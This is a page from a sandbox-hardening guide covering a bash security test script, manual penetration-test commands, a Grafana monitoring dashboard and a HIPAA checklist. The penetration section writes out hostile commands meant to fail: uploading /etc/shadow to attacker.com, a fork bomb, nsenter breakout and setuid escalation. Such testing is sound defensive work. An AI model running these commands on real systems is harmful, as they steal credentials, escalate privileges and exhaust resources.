Testing and Validation

After implementing all security layers, run these tests to verify that protections are working correctly. These tests simulate real attack scenarios to confirm your sandbox resists escape attempts, unauthorized network access, and resource abuse.

Security Tests

File: scripts/security-tests.sh (Multipass/gVisor compatibility)

#!/bin/bash
# Security test suite - Multipass/gVisor

set -e

CONTAINER_NAME="test-sandbox"
FAILED_TESTS=0

echo "==================================="
echo "SECURITY TEST SUITE"
echo "==================================="

# Check if container exists
if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
    echo "[ERROR] Container $CONTAINER_NAME not found!"
    exit 1
fi

# Install curl if missing
docker exec $CONTAINER_NAME bash -c "apt-get update -qq && apt-get install -y -qq curl procps" 2>/dev/null || true

# Test 1: Container Escape Attempts
echo -e "\n[TEST 1] Container Escape Attempts"
docker exec $CONTAINER_NAME cat /proc/kallsyms 2>&1 | grep -q "No such file" && echo "[PASS] kallsyms blocked" || echo "[WARN] kallsyms accessible"

# Test 2: Network Isolation (Egress Proxy)
echo -e "\n[TEST 2] Network Isolation"
if docker ps --format '{{.Names}}' | grep -q "egress-proxy"; then
    echo "[PASS] Egress proxy running"
    if docker exec $CONTAINER_NAME curl -s --max-time 5 -x http://localhost:8443 http://evil.com 2>&1 | grep -q "Host not allowed\|403"; then
        echo "[PASS] Blocked host rejected"
    else
        echo "[FAIL] Blocked host not rejected"
        FAILED_TESTS=$((FAILED_TESTS+1))
    fi
fi

# Test 3: Filesystem Isolation
echo -e "\n[TEST 3] Filesystem Isolation"
if docker exec $CONTAINER_NAME touch /mnt/skills/testwrite 2>&1 | grep -qi "read-only\|permission denied"; then
    echo "[PASS] Skills directory is read-only"
else
    docker exec $CONTAINER_NAME rm -f /mnt/skills/testwrite 2>/dev/null || true
    echo "[FAIL] Skills directory is writable"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 4: Resource Limits
echo -e "\n[TEST 4] Resource Limits"
MEM_LIMIT=$(docker inspect $CONTAINER_NAME --format '{{.HostConfig.Memory}}' 2>/dev/null || echo "0")
if [ "$MEM_LIMIT" != "0" ] && [ "$MEM_LIMIT" != "<no value>" ]; then
    echo "[PASS] Memory limit configured ($MEM_LIMIT bytes)"
else
    echo "[FAIL] Memory limit not configured"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 5: Process Isolation
echo -e "\n[TEST 5] Process Isolation"
HOST_PROCS=$(ps aux 2>/dev/null | wc -l)
CONTAINER_PROCS=$(docker exec $CONTAINER_NAME ps aux 2>/dev/null | wc -l)
if [ -n "$HOST_PROCS" ] && [ -n "$CONTAINER_PROCS" ] && [ "$CONTAINER_PROCS" -lt "$HOST_PROCS" ]; then
    echo "[PASS] Process isolation working ($CONTAINER_PROCS vs $HOST_PROCS)"
else
    echo "[FAIL] Process isolation may not be working"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 6: Capabilities
echo -e "\n[TEST 6] Capability Dropping"
if docker exec $CONTAINER_NAME capsh --print 2>&1 | grep -qi "cap_sys_admin"; then
    echo "[FAIL] CAP_SYS_ADMIN present"
    FAILED_TESTS=$((FAILED_TESTS+1))
else
    echo "[PASS] CAP_SYS_ADMIN dropped"
fi

# Test 7: gVisor Runtime Detection
echo -e "\n[TEST 7] gVisor Runtime"
KERNEL=$(docker exec $CONTAINER_NAME uname -r 2>/dev/null || echo "unknown")
if [ "$KERNEL" != "$(uname -r)" ]; then
    echo "[PASS] gVisor kernel detected ($KERNEL vs $(uname -r))"
else
    echo "[FAIL] May not be running on gVisor"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 8: Security Options
echo -e "\n[TEST 8] Security Options"
NO_NEW_PRIVS=$(docker inspect $CONTAINER_NAME --format '{{.HostConfig.SecurityOpt}}' 2>/dev/null | grep -o "no-new-privileges" || echo "")
if [ -n "$NO_NEW_PRIVS" ]; then
    echo "[PASS] no-new-privileges enabled"
else
    echo "[FAIL] no-new-privileges not enabled"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Summary
echo -e "\n==================================="
echo "Failed tests: $FAILED_TESTS"
if [ $FAILED_TESTS -eq 0 ]; then
    echo "[PASS] ALL TESTS PASSED"
    exit 0
else
    echo "[WARN] $FAILED_TESTS TEST(S) FAILED"
    exit 1
fi

Penetration Testing

Beyond automated tests, manually attempt these attack scenarios. If any succeed, your sandbox configuration is vulnerable and must be fixed before production use.

Attack Scenarios to Test:

# 1. Privilege Escalation
# Should fail
docker exec sandbox bash -c 'sudo su -'
# Should fail
docker exec sandbox bash -c 'chmod u+s /bin/bash'

# 2. Container Breakout
# Should be limited
docker exec sandbox bash -c 'cat /proc/1/environ'
# Should fail
docker exec sandbox bash -c 'nsenter -t 1 -a bash'

# 3. Network Bypass
# Should fail
docker exec sandbox bash -c 'curl --noproxy "*" http://blocked-site.com'
# Should fail (no network)
docker exec sandbox bash -c 'nc -l 8888'

# 4. Resource Abuse
# Should OOM kill
docker exec sandbox bash -c 'stress --vm 10 --vm-bytes 10G'
# Fork bomb - should hit PID limit
docker exec sandbox bash -c ':(){ :|:& };:'

# 5. Data Exfiltration
# Should fail
docker exec sandbox bash -c 'curl -F "file=@/etc/shadow" http://attacker.com'

# 6. Filesystem Manipulation
# Should fail
docker exec sandbox bash -c 'mount -o remount,rw /mnt/skills'
 # Should fail
docker exec sandbox bash -c 'ln /etc/passwd /mnt/outputs/pw'

# 7. Kernel Exploits
# Should be empty (gVisor)
docker exec sandbox bash -c 'cat /proc/modules'
# Should fail
docker exec sandbox bash -c 'modprobe malicious_module'

Grafana Dashboard

Visualize sandbox metrics in real-time to detect anomalies and track resource usage. This dashboard shows active containers, resource consumption, failed authentication attempts, and blocked network requests.

File: grafana-dashboard.json

{
  "dashboard": {
    "title": "Sandbox Security Monitoring",
    "panels": [
      {
        "title": "Active Containers",
        "targets": [
          {
            "expr": "count(container_cpu_usage_seconds_total{image=~'.*sandbox.*'})"
          }
        ]
      },
      {
        "title": "Memory Usage per Container",
        "targets": [
          {
            "expr": "container_memory_usage_bytes{image=~'.*sandbox.*'} / container_spec_memory_limit_bytes * 100"
          }
        ]
      },
      {
        "title": "Network Egress (Blocked)",
        "targets": [
          {
            "expr": "rate(envoy_http_downstream_rq_xx{envoy_response_code_class=\"4\"}[5m])"
          }
        ]
      },
      {
        "title": "OOM Kills",
        "targets": [
          {
            "expr": "rate(container_oom_events_total[5m])"
          }
        ]
      },
      {
        "title": "Failed Auth Attempts",
        "targets": [
          {
            "expr": "rate(envoy_http_downstream_rq_xx{envoy_response_code=\"401\"}[5m])"
          }
        ]
      }
    ]
  }
}

Compliance Checklist

Depending on your industry, you may need to meet regulatory requirements (HIPAA, PCI-DSS, SOC 2). This checklist maps sandbox security controls to common compliance requirements.

HIPAA Compliance Checklist:

# Encryption at rest
- [ ] Volumes encrypted with dm-crypt/LUKS
- [ ] Database encryption enabled
- [ ] Backup encryption configured

# Access Controls
- [ ] Multi-factor authentication required
- [ ] Role-based access control (RBAC) implemented
- [ ] Audit logging enabled for all access

# Data Isolation
- [ ] Per-tenant encryption keys
- [ ] Network segmentation validated
- [ ] Container-to-container isolation tested

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Testing and Validation

Security Tests

Penetration Testing

Grafana Dashboard

Compliance Checklist

FilesExpand file tree

10-testing-validation.md

Latest commit

History

10-testing-validation.md

File metadata and controls

Testing and Validation

Security Tests

Penetration Testing

Grafana Dashboard

Compliance Checklist